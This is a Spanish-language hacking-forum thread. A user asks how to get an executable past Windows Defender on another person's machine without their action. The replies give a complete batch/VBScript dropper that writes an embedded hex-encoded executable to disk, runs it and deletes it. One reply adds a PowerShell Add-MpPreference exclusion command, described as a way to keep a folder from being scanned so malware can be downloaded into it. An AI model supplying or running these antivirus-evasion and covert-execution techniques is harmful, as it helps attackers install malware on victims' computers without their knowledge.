Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: later200 en 23 Febrero 2022, 18:45 pm


Título: Como hacer que windows defender permita un .exe?
Publicado por: later200 en 23 Febrero 2022, 18:45 pm
buenas, alguien conoce un método para hacer que Windows defender permita un exe? ya sea desde un bat o alguna alternativa. (esto sin que la persona en cuestión haga nada, solamente al ejecutar algo)

Título: Re: Como hacer que windows defender permita un .exe?
Publicado por: leonel :) en 23 Febrero 2022, 18:48 pm
Desactiva lo xd

Título: Re: Como hacer que windows defender permita un .exe?
Publicado por: .xAk. en 24 Febrero 2022, 08:17 am
Si el exe no es dañino.

Si pasas el binario a hexadecimal ya lo puedes escribir en texto plano y puedes meterlo dentro de un script.

mira el siguiente código batch (vbs) en el que se integra cursospos.exe, el script lo escribe en binario lo ejecuta y luego lo borra y nada impide nada.

Código
  1. @echo off
  2. setlocal enabledelayedexpansion
  3.  
  4. Rem cursorpos and colorshow created by Antonio Perez Ayala
  5. Rem http://www.dostips.com/forum/viewtopic.php?f=3&t=3428
  6. call :heredoc cursorpos >cursorpos.hex && goto endCursorpos
  7. 4D5A900003[3]04[3]FFFF[2]B8[7]40[35]B0[3]0E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F74
  8. 2062652072756E20696E20444F53206D6F64652E0D0D0A24[7]55B5B8FD11D4D6AE11D4D6AE11D4D6AE9FCBC5AE18D4D6AEED
  9. F4C4AE13D4D6AE5269636811D4D6AE[8]5045[2]4C010200EB84E24F[8]E0000F010B01050C0002[3]02[7]10[3]10[3]20[4]40[2]10
  10. [3]02[2]04[7]04[8]30[3]02[6]03[5]10[2]10[4]10[2]10[6]10[11]1C20[2]28[84]20[2]1C[27]2E74657874[3]4201[3]10[3]02[3]02[14]20[2]60
  11. 2E7264617461[2]F6[4]20[3]02[3]04[14]40[2]40[8]E806[3]50E81301[2]558BEC83C4E06AF5E81201[2]8945FC8D45E650FF75FCE8
  12. FD[3]668B45EC668945E4E8BC[3]E8DB[3]803E0075058B45EAEB5C803E3D750646E8C6[3]668B4DEAE84A[3]8945EAE8B5[3]803E
  13. 007418803E2C750646E8A5[3]668B4DE4E829[3]668945EC8B5DEA53FF75FCE8AE[3]8D45E650536A018D45E350FF75FCE895[3]0F
  14. B645E3C9C333C032DB33D28A164680FA2B740880FA2D750980CB0280CB018A164680FA30720F80FA39770A80EA306BC00A03
  15. C2EBE9F6C301740BF6C302740366F7D86603C14EC3CCCCCCCCCCCCCCCCCCCCCCCCCCE847[3]8BF08A06463C2275098A06463C
  16. 2275F9EB0C8A06463C20740484C075F54EC38A06463C2074F94EC3CCFF2514204000FF2500204000FF2504204000FF250820
  17. 4000FF250C204000FF25102040[191]6E20[2]8C20[2]9C20[2]BA20[2]D620[2]6020[6]4420[10]E820[3]20[22]6E20[2]8C20[2]9C20[2]BA
  18. 20[2]D620[2]6020[6]9B004578697450726F6365737300F500476574436F6E736F6C6553637265656E427566666572496E666F
  19. [2]6A0147657453746448616E646C65[2]380252656164436F6E736F6C654F757470757443686172616374657241006D025365
  20. 74436F6E736F6C65437572736F72506F736974696F6E[2]E600476574436F6D6D616E644C696E6541006B65726E656C33322E
  21. 646C6C[268]
  22. :endCursorpos
  23.  
  24. call :heredoc hexchar >hexchar.vbs && goto endHexchar
  25. Rem Hex digits to Ascii Characters conversion
  26. Rem Antonio Perez Ayala - Apr/14/2012
  27.  
  28. Dim line,index,count
  29. line = WScript.StdIn.ReadLine()
  30. While line <> ""
  31.    index = 1
  32.    While index < len(line)
  33.       If Mid(line,index,1) = "[" Then
  34.          index = index+1
  35.          count = 0
  36.          While Mid(line,index+count,1) <> "]"
  37.             count = count+1
  38.          WEnd
  39.          For i=1 To Int(Mid(line,index,count))
  40.             WScript.StdOut.Write Chr(0)
  41.          Next
  42.          index = index+count+1
  43.       Else
  44.          WScript.StdOut.Write Chr(CByte("&H"&Mid(line,index,2)))
  45.          index = index+2
  46.       End If
  47.    WEnd
  48.    line = WScript.StdIn.ReadLine()
  49. WEnd
  50. :endHexchar
  51.  
  52. :: Crear cursorpos.exe
  53. cscript /nologo /B /E:VBS HexChar.vbs < "cursorpos.hex" > "cursorpos.exe"
  54. del cursorpos.hex
  55. del hexchar.vbs
  56.  
  57. cls
  58. cursorpos
  59. cursorpos=4,5
  60. echo hola mundo
  62. del cursorpos.exe
  63. goto :EOF
  64.  
  65. :heredoc <uniqueIDX>
  66. setlocal enabledelayedexpansion
  67. set go=
  68. for /f "delims=" %%A in ('findstr /n "^" "%~f0"') do (
  69.     set "line=%%A" && set "line=!line:*:=!"
  70.     if defined go (if #!line:~1!==#!go::=! (goto :EOF) else echo(!line!)
  71.     if "!line:~0,13!"=="call :heredoc" (
  72.         for /f "tokens=3 delims=>^ " %%i in ("!line!") do (
  73.             if #%%i==#%1 (
  74.                 for /f "tokens=2 delims=&" %%I in ("!line!") do (
  75.                     for /f "tokens=2" %%x in ("%%I") do set "go=%%x"
  76.                 )
  77.             )
  78.         )
  79.     )
  80. )
  81. goto :EOF

Título: Re: Como hacer que windows defender permita un .exe?
Publicado por: 0x22 en 1 Marzo 2022, 20:55 pm
Buenas, hace un tiempo incorpore este codigo en uno de mis scripts en .bat:
powershell.exe Add-MpPreference -ExclusionPath “C:\Folder1”

Basicamente lo que hace es excluir x archivo para que el windows defender no lo escanee y descargar el malware en esa carpeta.
No se exactamente como se hace con un .exe, aunque te recomiendo buscar por google

Título: Re: Como hacer que windows defender permita un .exe?
Publicado por: Tirenex en 6 Abril 2022, 14:50 pm
Naaa, es mucho más facil que eso, yo lo usé una vez era en formato batch, lo que hacía es gracias a 3 o 4 lineas de script en Powershell, eliminaba el rastreo del antivirus de Windows 10 por donde lo pusieras, lo que pasa es que creo que lo eliminé


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines